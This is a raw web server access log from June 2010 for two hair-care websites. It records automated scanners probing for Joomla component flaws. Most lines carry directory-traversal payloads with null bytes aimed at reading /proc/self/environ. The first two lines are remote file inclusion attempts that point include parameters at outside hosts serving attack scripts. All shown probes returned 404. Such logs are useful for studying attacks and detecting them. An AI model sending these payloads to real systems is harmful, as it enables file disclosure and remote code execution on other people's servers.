94.228.131.90 - - [20/Jun/2010:21:11:10 -0700] "GET /logs/access_100531.log%20%20/skin/zero_vote/setup.php?%20dir=http://ssq-dla.com/components/com_content/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.59.156.163 - - [20/Jun/2010:21:16:13 -0700] "GET /logs/access_100125.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.72.70.56 - - [20/Jun/2010:21:18:19 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.72.70.56 - - [20/Jun/2010:21:18:19 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.72.70.56 - - [20/Jun/2010:21:19:03 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
188.72.70.56 - - [20/Jun/2010:21:19:03 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:21:25:12 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:21:25:13 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:21:25:13 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:21:25:24 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:21:25:25 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:21:25:26 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:21:28:08 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:28:08 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:28:09 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:28:55 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:28:56 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:28:56 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:29:03 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:29:04 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:29:05 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:29:24 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:29:25 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:29:25 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:31:15 -0700] "GET /logs/access_100531.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:31:43 -0700] "GET /logs/access_100531.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:33:19 -0700] "GET /logs/access_100531.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:33:19 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:33:20 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:33:35 -0700] "GET /logs/access_100531.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:33:35 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:33:36 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
91.121.20.205 - - [20/Jun/2010:21:34:18 -0700] "GET /logs/access_091102.log//index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
91.121.20.205 - - [20/Jun/2010:21:34:18 -0700] "GET /logs/access_091102.log//index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
91.121.20.205 - - [20/Jun/2010:21:34:18 -0700] "GET /index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
91.121.20.205 - - [20/Jun/2010:21:34:18 -0700] "GET /index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
91.121.20.205 - - [20/Jun/2010:21:34:18 -0700] "GET /logs//index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
91.121.20.205 - - [20/Jun/2010:21:34:18 -0700] "GET /logs//index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.72.70.56 - - [20/Jun/2010:21:34:39 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.72.70.56 - - [20/Jun/2010:21:34:40 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.72.70.56 - - [20/Jun/2010:21:34:40 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
91.121.20.205 - - [20/Jun/2010:21:34:42 -0700] "GET /logs/access_091102.log//index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
91.121.20.205 - - [20/Jun/2010:21:34:42 -0700] "GET /index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
91.121.20.205 - - [20/Jun/2010:21:34:42 -0700] "GET /logs//index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.72.70.56 - - [20/Jun/2010:21:35:02 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.72.70.56 - - [20/Jun/2010:21:35:02 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.72.70.56 - - [20/Jun/2010:21:35:03 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.72.70.56 - - [20/Jun/2010:21:37:10 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
188.72.70.56 - - [20/Jun/2010:21:37:10 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
188.72.70.56 - - [20/Jun/2010:21:37:11 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
77.88.25.28 - - [20/Jun/2010:21:37:14 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18766 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
188.72.70.56 - - [20/Jun/2010:21:37:21 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
188.72.70.56 - - [20/Jun/2010:21:37:21 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
188.72.70.56 - - [20/Jun/2010:21:37:22 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:21:38:42 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:21:38:43 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:21:38:43 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:21:39:13 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:39:14 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:39:15 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:39:39 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:39:40 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:39:41 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:39:49 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:21:39:49 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:21:39:50 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:21:39:50 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:21:39:50 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:21:39:51 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:21:40:08 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:21:40:09 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:21:40:09 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
209.200.245.35 - - [20/Jun/2010:21:41:17 -0700] "GET /logs/access_091102.log//index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
209.200.245.35 - - [20/Jun/2010:21:41:18 -0700] "GET /index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
209.200.245.35 - - [20/Jun/2010:21:41:18 -0700] "GET /logs//index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
209.200.245.35 - - [20/Jun/2010:21:41:32 -0700] "GET /logs/access_091102.log//index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
209.200.245.35 - - [20/Jun/2010:21:41:32 -0700] "GET /logs/access_091102.log//index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
209.200.245.35 - - [20/Jun/2010:21:41:32 -0700] "GET /index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
209.200.245.35 - - [20/Jun/2010:21:41:32 -0700] "GET /index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
209.200.245.35 - - [20/Jun/2010:21:41:32 -0700] "GET /logs//index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
209.200.245.35 - - [20/Jun/2010:21:41:32 -0700] "GET /logs//index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
209.200.245.35 - - [20/Jun/2010:21:41:35 -0700] "GET /logs/access_091102.log//index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
209.200.245.35 - - [20/Jun/2010:21:41:35 -0700] "GET /index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
209.200.245.35 - - [20/Jun/2010:21:41:35 -0700] "GET /logs//index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.227.132.232 - - [20/Jun/2010:21:41:59 -0700] "GET /logs/access_091102.log//index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
67.227.132.232 - - [20/Jun/2010:21:42:00 -0700] "GET /index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
67.227.132.232 - - [20/Jun/2010:21:42:00 -0700] "GET /logs//index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
202.160.123.72 - - [20/Jun/2010:21:42:03 -0700] "GET /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
202.160.123.72 - - [20/Jun/2010:21:42:03 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
202.160.123.72 - - [20/Jun/2010:21:42:04 -0700] "GET /logs/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.227.132.232 - - [20/Jun/2010:21:42:09 -0700] "GET /logs/access_091102.log//index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
67.227.132.232 - - [20/Jun/2010:21:42:09 -0700] "GET /index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
67.227.132.232 - - [20/Jun/2010:21:42:09 -0700] "GET /logs//index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
67.227.132.232 - - [20/Jun/2010:21:42:45 -0700] "GET /logs/access_091102.log//index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
67.227.132.232 - - [20/Jun/2010:21:42:46 -0700] "GET /index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
67.227.132.232 - - [20/Jun/2010:21:42:46 -0700] "GET /logs//index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
67.227.132.232 - - [20/Jun/2010:21:42:46 -0700] "GET /logs/access_091102.log//index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
67.227.132.232 - - [20/Jun/2010:21:42:46 -0700] "GET /index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
67.227.132.232 - - [20/Jun/2010:21:42:46 -0700] "GET /logs//index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.72.70.56 - - [20/Jun/2010:21:42:55 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.72.70.56 - - [20/Jun/2010:21:43:04 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.72.70.56 - - [20/Jun/2010:21:43:08 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
188.72.70.56 - - [20/Jun/2010:21:43:15 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
188.72.70.56 - - [20/Jun/2010:21:45:24 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.72.70.56 - - [20/Jun/2010:21:45:24 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
